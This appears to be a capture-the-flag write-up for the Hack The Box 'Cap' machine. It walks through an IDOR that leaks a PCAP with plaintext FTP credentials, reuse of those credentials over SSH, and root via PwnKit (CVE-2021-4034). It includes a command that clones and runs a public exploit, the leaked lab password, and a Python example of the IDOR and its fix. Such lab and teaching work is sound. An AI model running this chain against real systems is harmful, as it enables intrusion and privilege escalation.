HTB Cap: IDOR to PCAP Credential Leak and PwnKit Privilege Escalation
Introduction
Cap is an Easy Linux machine that chains three realistic vulnerabilities: IDOR on a network capture endpoint leading to credential leak, credential reuse across FTP and SSH, and privilege escalation via CVE-2021-4034 (PwnKit).
Attack Overview
Nmap → Open FTP/SSH/HTTP
↓
Web fuzzing → /capture redirects to /data/1
↓
IDOR: /data/0 → PCAP download
↓
Wireshark: nathan:Buck3tH4TF0RM3!
↓
FTP login → user.txt
↓
SSH login as nathan
↓
LinPEAS → pkexec SUID (v0.105)
↓
CVE-2021-4034 → root
Reconnaissance
Nmap scan:
```
nmap -sC -sV -oN nmap_report.txt 10.129.32.185
```
| Port | Service | Version |
|---|---|---|
| 21 | FTP | vsftpd 3.0.3 |
| 22 | SSH | OpenSSH 8.2p1 |
| 80 | HTTP | Gunicorn (Security Dashboard) |
FTP anonymous login is denied. The web application is a Python backend (Gunicorn, likely Flask).
Web Enumeration
Directory fuzzing reveals interesting paths:
| Path | Status | Notes |
|---|---|---|
| /ip | 200 | Network interface info |
| /netstat | 200 | Active connections |
| /data | 302 | Redirects to / |
| /capture | 302 | Redirects to /data/1 |
The /capture endpoint redirects to /data/1. The integer ID is immediately suspicious.
IDOR – Credential Leak via PCAP
Navigating to /data/1 shows a download link for a .pcap network capture file. The dashboard reveals the logged-in username: nathan.
This is an Insecure Direct Object Reference (IDOR): the application uses a user-supplied integer to directly reference a stored object without verifying ownership.
Change the ID to 0:
```
http://cap.htb/data/0
```
Download the PCAP and open it in Wireshark. Filtering for FTP traffic reveals a plaintext authentication session:
```
USER nathan
PASS Buck3tH4TF0RM3!
```
Credentials obtained: nathan:Buck3tH4TF0RM3!
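To show what the missing check looks like in code, here is an added example (not the Cap application's own Flask code): a vulnerable lookup that serves any capture by integer id, the same lookup with an ownership check, and a per-session indirect-reference layer of the kind the remediation calls for. The capture store, its owners ("admin", "nathan") and the file contents are constructed sample data.

```python
import secrets
from dataclasses import dataclass, field

# Constructed sample store: capture id -> (owner, file bytes).
CAPTURES = {
    0: ("admin", b"pcap-with-ftp-creds"),
    1: ("nathan", b"nathan-own-capture"),
}

class NotFound(Exception):
    """Used for both missing and foreign ids, so the response is not an oracle."""

def get_capture_vulnerable(capture_id: int) -> bytes:
    """Mirrors the IDOR: any logged-in user can fetch any id (/data/<id>)."""
    return CAPTURES[capture_id][1]

def get_capture_checked(session_user: str, capture_id: int) -> bytes:
    """Hardened direct reference: the owner is compared before serving."""
    entry = CAPTURES.get(capture_id)
    if entry is None or entry[0] != session_user:
        raise NotFound(capture_id)
    return entry[1]

@dataclass
class Session:
    user: str
    # Indirect references: random per-session token -> real capture id.
    ref_map: dict = field(default_factory=dict)

    def list_captures(self) -> list:
        """Hand out opaque tokens for this user's own captures only."""
        tokens = []
        for cid, (owner, _) in CAPTURES.items():
            if owner == self.user:
                token = secrets.token_urlsafe(16)
                self.ref_map[token] = cid
                tokens.append(token)
        return tokens

    def download(self, token: str) -> bytes:
        """Resolve the token inside the session; the real id is never exposed."""
        cid = self.ref_map.get(token)
        if cid is None:
            raise NotFound(token)
        return get_capture_checked(self.user, cid)

def denied(fn, *args) -> bool:
    """Helper for checks: True if the lookup was refused with NotFound."""
    try:
        fn(*args)
    except NotFound:
        return True
    return False
```

With the vulnerable function, a session for nathan can still read capture 0; with either hardened path it gets the same NotFound as for an id that does not exist.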
Foothold – FTP + SSH
FTP login:
```
ftp 10.129.32.185
# user: nathan
# pass: Buck3tH4TF0RM3!
ftp> get user.txt
```
The same credentials work over SSH:
```
ssh nathan@10.129.32.185
# password: Buck3tH4TF0RM3!
```
User flag:
[redacted]
Privilege Escalation – CVE-2021-4034 (PwnKit)
Checking sudo -l shows no sudo rights. LinPEAS reveals:
```
Pkexec binary found at: /usr/bin/pkexec
-rwsr-xr-x 1 root root 31032 Aug 16 2019 /usr/bin/pkexec
pkexec version 0.105
```
pkexec version 0.105 is vulnerable to CVE-2021-4034 (PwnKit). This vulnerability allows any local user to escalate to root through a memory corruption bug in pkexec’s argument handling.
Exploitation:
```
git clone https://github.com/berdav/CVE-2021-4034
cd CVE-2021-4034
make
./cve-2021-4034
```
Root flag:
[redacted]
Key Takeaways
| Vulnerability | Root Cause | Remediation |
|---|---|---|
| IDOR on PCAP endpoint | User-supplied integer directly references object without ownership check | Validate object ownership before serving resources; use indirect references |
| Plaintext credentials in PCAP | FTP authentication sent unencrypted | Use SFTP or FTPS; avoid plaintext protocols |
| Credential reuse across FTP and SSH | Same password for multiple services | Use unique credentials per service |
| CVE-2021-4034 (PwnKit) | pkexec SUID binary with argument parsing vulnerability | Update polkit to patched version (post-Jan 2022); remove SUID from pkexec if not needed |
Resources
- Nmap — Port scanning and service detection
- ffuf — Directory fuzzing
- Wireshark — PCAP analysis
- LinPEAS — Local privilege escalation enumeration
- CVE-2021-4034 PoC — PwnKit exploit